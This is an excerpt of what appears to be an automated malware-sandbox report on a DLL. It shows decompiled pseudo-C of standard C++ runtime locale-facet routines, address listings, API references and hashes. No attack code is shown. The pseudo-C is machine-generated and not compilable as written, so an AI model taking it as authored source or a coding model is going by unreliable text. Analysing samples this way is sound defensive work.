																			 *(_t506 - 4) = 1;
																			E6E206FD3(__eflags, _t475);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t475 + 4))))();
																			 *0x6e2c6db0 = _t475;
																			goto L33;
																		}
																	} else {
																		_t475 = _t487;
																		goto L33;
																	}
																}
															} else {
																_t474 =  *(_t506 - 0x10);
																 *(_t506 - 0x10) = _t474;
																 *(_t506 - 4) = 1;
																E6E206FD3(__eflags, _t474);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t474 + 4))))();
																 *0x6e2c6dd8 = _t474;
																goto L26;
															}
														} else {
															_t474 = _t486;
															goto L26;
														}
													}
												} else {
													_t473 =  *(_t506 - 0x10);
													 *(_t506 - 0x10) = _t473;
													 *(_t506 - 4) = 1;
													E6E206FD3(__eflags, _t473);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t473 + 4))))();
													 *0x6e2c6dc4 = _t473;
													goto L19;
												}
											} else {
												_t473 = _t485;
												goto L19;
											}
										}
									} else {
										_t472 =  *(_t506 - 0x10);
										 *(_t506 - 0x10) = _t472;
										 *(_t506 - 4) = 1;
										E6E206FD3(__eflags, _t472);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t472 + 4))))();
										 *0x6e2c6dc8 = _t472;
										goto L12;
									}
								} else {
									_t472 = _t484;
									goto L12;
								}
							}
						} else {
							_t471 =  *(_t506 - 0x10);
							 *(_t506 - 0x10) = _t471;
							 *(_t506 - 4) = 1;
							E6E206FD3(__eflags, _t471);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 4))))();
							 *0x6e2c6df4 = _t471;
							goto L5;
						}
					} else {
						_t471 = _t483;
						goto L5;
					}
				}
			}







































                          0x6e20f60d
                          0x6e20f60d
                          0x6e20f614
                          0x6e20f61e
                          0x6e20f623
                          0x6e20f62e
                          0x6e20f632
                          0x6e20f635
                          0x6e20f63a
                          0x6e20f63e
                          0x6e20f643
                          0x6e20f647
                          0x6e20f68c
                          0x6e20f68f
                          0x6e20f69b
                          0x6e20f649
                          0x6e20f64b
                          0x6e20f651
                          0x6e20f657
                          0x6e20f65f
                          0x6e20f662
                          0x6e20f69f
                          0x6e20f6ad
                          0x6e20f6b2
                          0x6e20f6ba
                          0x6e20f6c4
                          0x6e20f6c9
                          0x6e20f6d4
                          0x6e20f6d8
                          0x6e20f6db
                          0x6e20f6e0
                          0x6e20f6e9
                          0x6e20f6eb
                          0x6e20f6ed
                          0x6e20f732
                          0x6e20f735
                          0x6e20f741
                          0x6e20f6ef
                          0x6e20f6ef
                          0x6e20f6f1
                          0x6e20f6f7
                          0x6e20f6fd
                          0x6e20f705
                          0x6e20f708
                          0x6e20f745
                          0x6e20f753
                          0x6e20f758
                          0x6e20f760
                          0x6e20f76a
                          0x6e20f76f
                          0x6e20f77a
                          0x6e20f77e
                          0x6e20f781
                          0x6e20f786
                          0x6e20f78f
                          0x6e20f791
                          0x6e20f793
                          0x6e20f7d8
                          0x6e20f7db
                          0x6e20f7e7
                          0x6e20f795
                          0x6e20f795
                          0x6e20f797
                          0x6e20f79d
                          0x6e20f7a3
                          0x6e20f7ab
                          0x6e20f7ae
                          0x6e20f7eb
                          0x6e20f7f9
                          0x6e20f7fe
                          0x6e20f806
                          0x6e20f810
                          0x6e20f815
                          0x6e20f820
                          0x6e20f824
                          0x6e20f827
                          0x6e20f82c
                          0x6e20f835
                          0x6e20f837
                          0x6e20f839
                          0x6e20f87e
                          0x6e20f881
                          0x6e20f88d
                          0x6e20f83b
                          0x6e20f83b
                          0x6e20f83d
                          0x6e20f843
                          0x6e20f849
                          0x6e20f851
                          0x6e20f854
                          0x6e20f891
                          0x6e20f89f
                          0x6e20f8a4
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8db
                          0x6e20f8dd
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3
                          0x6e20f856
                          0x6e20f856
                          0x6e20f859
                          0x6e20f85d
                          0x6e20f861
                          0x6e20f86e
                          0x6e20f876
                          0x6e20f878
                          0x00000000
                          0x6e20f878
                          0x6e20f83f
                          0x6e20f83f
                          0x00000000
                          0x6e20f83f
                          0x6e20f83d
                          0x6e20f7b0
                          0x6e20f7b0
                          0x6e20f7b3
                          0x6e20f7b7
                          0x6e20f7bb
                          0x6e20f7c8
                          0x6e20f7d0
                          0x6e20f7d2
                          0x00000000
                          0x6e20f7d2
                          0x6e20f799
                          0x6e20f799
                          0x00000000
                          0x6e20f799
                          0x6e20f797
                          0x6e20f70a
                          0x6e20f70a
                          0x6e20f70d
                          0x6e20f711
                          0x6e20f715
                          0x6e20f722
                          0x6e20f72a
                          0x6e20f72c
                          0x00000000
                          0x6e20f72c
                          0x6e20f6f3
                          0x6e20f6f3
                          0x00000000
                          0x6e20f6f3
                          0x6e20f6f1
                          0x6e20f664
                          0x6e20f664
                          0x6e20f667
                          0x6e20f66b
                          0x6e20f66f
                          0x6e20f67c
                          0x6e20f684
                          0x6e20f686
                          0x00000000
                          0x6e20f686
                          0x6e20f64d
                          0x6e20f64d
                          0x00000000
                          0x6e20f64d
                          0x6e20f64b

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F614
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F61E
                          • int.LIBCPMT ref: 6E20F635
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F658
                          • std::_Facet_Register.LIBCPMT ref: 6E20F66F
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F68F
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F6AD
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID:
                          • API String ID: 113178234-0
                          • Opcode ID: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
                          • Instruction ID: 9f029279f3dec20ff8cca31f8de851de466ce8a13851c521c966489a781f5d2a
                          • Opcode Fuzzy Hash: cb6f4d7a64f764b0205d0bbe6a2a1405ced434aaf0f13f0228c205cd98ea7f70
                          • Instruction Fuzzy Hash: 24110675D0051E8FCF04DBE0C894AEEB77BAF44B18F240918E420AB2D0DB749A45CBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21B74C, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E21B74C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t374 - 0x14, 0);
				_t357 =  *0x6e2c6e28; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1E161C(0x6e2c6e08);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E2066BA(_t374 - 0x14);
					return E6E220075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E21BF46(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t374 - 0x20);
							E6E223D74(_t374 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t348, _t357, 0x14);
							E6E206653(_t374 - 0x14, 0);
							_t358 =  *0x6e2c6e2c; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1E161C(0x6e2c6e0c);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E2066BA(_t374 - 0x14);
								return E6E220075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E21BFE8(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t374 - 0x20);
										E6E223D74(_t374 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t265, _t349, _t358, 0x14);
										E6E206653(_t374 - 0x14, 0);
										_t359 =  *0x6e2c6e30; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1E161C(0x6e2c6e10);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E2066BA(_t374 - 0x14);
											return E6E220075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E21C050(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t374 - 0x20);
													E6E223D74(_t374 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t265, _t350, _t359, 0x14);
													E6E206653(_t374 - 0x14, 0);
													_t360 =  *0x6e2c6e34; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1E161C(0x6e2c6e14);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E2066BA(_t374 - 0x14);
														return E6E220075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E21C0B8(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t374 - 0x20);
																E6E223D74(_t374 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t265, _t351, _t360, 0x14);
																E6E206653(_t374 - 0x14, 0);
																_t361 =  *0x6e2c6e3c; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1E161C(0x6e2c6e1c);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E2066BA(_t374 - 0x14);
																	return E6E220075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E21C120(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t374 - 0x20);
																			E6E223D74(_t374 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t265, _t352, _t361, 0x14);
																			E6E206653(_t374 - 0x14, 0);
																			_t362 =  *0x6e2c6e38; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1E161C(0x6e2c6e18);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E2066BA(_t374 - 0x14);
																				return E6E220075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E21C1A4(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t374 - 0x20);
																						E6E223D74(_t374 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t265, _t353, _t362, 0x14);
																						E6E206653(_t374 - 0x14, 0);
																						_t363 =  *0x6e2c6e40; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1E161C(0x6e2c6e20);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E2066BA(_t374 - 0x14);
																							return E6E220075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E21C229(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t374 - 0x20);
																									E6E223D74(_t374 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t265, _t354, _t363, 0x14);
																									E6E206653(_t374 - 0x14, 0);
																									_t364 =  *0x6e2c6e44; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1E161C(0x6e2c6e24);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1E171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E2066BA(_t374 - 0x14);
																										return E6E220075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E21C295(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1E1438(_t321);
																												E6E223D74(_t374 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e26851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e26c414;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E21D028(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E220075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E206FD3(__eflags, _t355);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e2c6e44 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E206FD3(__eflags, _t354);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e2c6e40 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E206FD3(__eflags, _t353);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e2c6e38 = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E206FD3(__eflags, _t352);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e2c6e3c = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E206FD3(__eflags, _t351);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e2c6e34 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E206FD3(__eflags, _t350);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e2c6e30 = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E206FD3(__eflags, _t349);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e2c6e2c = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E206FD3(__eflags, _t348);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e2c6e28 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}






























                          0x6e21b74c
                          0x6e21b74c
                          0x6e21b753
                          0x6e21b75d
                          0x6e21b762
                          0x6e21b76d
                          0x6e21b771
                          0x6e21b774
                          0x6e21b779
                          0x6e21b77d
                          0x6e21b782
                          0x6e21b786
                          0x6e21b7cb
                          0x6e21b7ce
                          0x6e21b7da
                          0x6e21b788
                          0x6e21b78a
                          0x6e21b790
                          0x6e21b796
                          0x6e21b79e
                          0x6e21b7a1
                          0x6e21b7de
                          0x6e21b7ec
                          0x6e21b7f1
                          0x6e21b7f9
                          0x6e21b803
                          0x6e21b808
                          0x6e21b813
                          0x6e21b817
                          0x6e21b81a
                          0x6e21b81f
                          0x6e21b828
                          0x6e21b82a
                          0x6e21b82c
                          0x6e21b871
                          0x6e21b874
                          0x6e21b880
                          0x6e21b82e
                          0x6e21b82e
                          0x6e21b830
                          0x6e21b836
                          0x6e21b83c
                          0x6e21b844
                          0x6e21b847
                          0x6e21b884
                          0x6e21b892
                          0x6e21b897
                          0x6e21b89f
                          0x6e21b8a9
                          0x6e21b8ae
                          0x6e21b8b9
                          0x6e21b8bd
                          0x6e21b8c0
                          0x6e21b8c5
                          0x6e21b8ce
                          0x6e21b8d0
                          0x6e21b8d2
                          0x6e21b917
                          0x6e21b91a
                          0x6e21b926
                          0x6e21b8d4
                          0x6e21b8d4
                          0x6e21b8d6
                          0x6e21b8dc
                          0x6e21b8e2
                          0x6e21b8ea
                          0x6e21b8ed
                          0x6e21b92a
                          0x6e21b938
                          0x6e21b93d
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b974
                          0x6e21b976
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
